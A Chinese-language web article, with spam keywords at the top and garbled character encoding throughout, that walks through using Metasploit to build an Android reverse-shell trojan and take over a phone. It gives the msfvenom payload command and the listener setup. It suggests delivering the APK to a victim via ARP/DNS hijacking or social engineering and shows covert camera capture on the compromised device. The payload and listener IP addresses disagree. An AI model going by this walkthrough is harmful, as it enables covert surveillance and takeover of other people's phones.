欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

MSF入侵安卓手機(jī) MSF又是什么

  發(fā)布時間:2015-12-17 16:06:28   作者:佚名   我要評論
這篇文章主要介紹了MSF入侵安卓手機(jī)的詳細(xì)過程,又介紹了MSF是什么、以及作用,感興趣的小伙伴們可以參考一下

MSF是Metasploit的簡稱,Metasploit是一款開源的安全漏洞檢測工具,非常強(qiáng)大,分別有Windows版和Linux版,工具里集成了許多微軟公布的漏洞(0day)。

我這里做測試的系統(tǒng)是Backbox linux ,這是一款網(wǎng)絡(luò)滲透,信息安全評估系統(tǒng)。里邊安裝了許許多多的工具。其中MSF就自帶有。當(dāng)然還有其它的 比如Kali linux 、Back Track這些等等。

環(huán)境:Backbox linux+MSF

目標(biāo):一臺安卓手機(jī)

既然是入侵安卓手機(jī),肯定要先配置一個安卓木馬,那我們看看本機(jī)的IP

本機(jī)IP:192.168.1.6

在到終端輸入命令:msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=5555 R > /root/apk.apk

以前的MSF老版本是用msfpayload生成木馬 現(xiàn)在在新版本中都用msfvenom代替了,所以有些朋友在終端輸入msfpayload的時候 會提示

msfpayload無法找到命令 所以使用msfvenom即可,這里L(fēng)HOST 對應(yīng)的是本機(jī)的IP地址 LPORT對應(yīng)你要監(jiān)聽的端口 然后生成木馬的路徑

這樣我們就在/root/路徑下生成了一個APK的安卓木馬文件,至于木馬的免殺暫且不談?,F(xiàn)在我們在來啟動MSF工具

輸入命令:msfconsole

然后輸入:

1. use exploit/multi/handler 加載模塊

2.set payload android/meterpreter/reverse_tcp 選擇Payload

3.show options 查看參數(shù)設(shè)置

我們看見payload里邊有兩個參數(shù)要設(shè)置 LHOST和LPORT 表示地址和端口 默認(rèn)的端口是4444 現(xiàn)在我們來更改設(shè)置

1.set LHOST 192.168.1.6 這里的地址設(shè)置成我們剛才生成木馬的IP地址

2.set LPORT 5555 這里的端口設(shè)置成剛才我們生成木馬所監(jiān)聽的端口

3.exploit 開始執(zhí)行漏洞 開始監(jiān)聽...

OK,一切準(zhǔn)備工作準(zhǔn)備就緒。。?,F(xiàn)在要做的就是把木馬文件搞到人家的手機(jī)上,思路有很多 可以DNS arp劫持欺騙 只要對方用手機(jī)下載文件 就會下載我們的木馬文件

還有社工什么等等的,這里我就簡單的把木馬文件弄我自己的手機(jī)上做測試

安裝完成后 會在桌面上生成一個MainActivity的程序圖標(biāo) 這個就是我們剛才生成的木馬 當(dāng)我們點(diǎn)擊了這個圖標(biāo) 手機(jī)會沒有任何反應(yīng) 其實(shí)木馬已經(jīng)開始運(yùn)行起來了

我們可以在我們的MSF里看見有一個會話連接了

這樣對方的手機(jī)就就被我們控制了,查看手機(jī)系統(tǒng)信息,輸入命令 sysinfo

webcam_list查看手機(jī)攝影頭有幾個 這里顯示兩項(xiàng) 分別表示有前后兩個攝像頭

webcam_snap 隱秘拍照功能

后邊跟上參數(shù)-i 指定使用那個攝像頭拍照

可以看見我們分別對前后攝像頭都拍了照 保存到了桌面上

還可以輸入命令webcam_stream 開啟攝像頭

其它的功能還有更多,以后再為大家依依介紹,希望這篇大家會喜歡。

相關(guān)文章

  • 手機(jī)木馬盜取網(wǎng)銀過程大揭秘 驗(yàn)證碼短信尤為關(guān)鍵

    360手機(jī)安全中心接到大量用戶舉報(bào),稱其遭受短信詐騙,被騙金額多數(shù)以萬計(jì)。最終都是因?yàn)橛脩糁姓泻?,?yàn)證碼被木馬偷偷轉(zhuǎn)發(fā)到不法分子手機(jī)中。
    2015-09-21
  • 如何快速清除系統(tǒng)中的木馬病毒 木馬病毒清除

    黑客入侵后要做的事就是上傳木馬后門,為了能夠讓上傳的木馬不被發(fā)現(xiàn),他們會想盡種種方法對其進(jìn)行偽裝。而作為被害者,我們又該如何識破偽裝,將系統(tǒng)中的木馬統(tǒng)統(tǒng)清除掉呢
    2015-09-15
  • 手機(jī)病毒的剖析與防治

      手機(jī)病毒是病毒的一個分支,雖然其存在只有短短數(shù)年,但在將來很可能會隨著3G的推廣而大量涌現(xiàn)。   病毒類型:手機(jī)病毒   病毒目的:破壞手機(jī)系統(tǒng),狂發(fā)短信等  
    2009-06-28
  • 手機(jī)停機(jī)一樣可以無限量免費(fèi)上網(wǎng)

      手機(jī)停機(jī)一樣可以無限量免費(fèi)上網(wǎng)   現(xiàn)在向大家透露一個如何激活已停機(jī)卡的方法!?激活了以后就可以免費(fèi)上網(wǎng)了。注:《本人動感地帶的卡已測,通過》!   首先
    2009-06-28
  • 沒有手機(jī)?不支持JAVA?也能使用QQ密保令牌

      騰訊公司在2009年5月7日上午9點(diǎn)推出全新的QQ安全中心,特別推出密保令牌服務(wù)。密保令牌是二代密保其中的一個密保手段,需要安裝在手機(jī)上,可以顯示6位動態(tài)密碼。當(dāng)您成
    2009-06-28

最新評論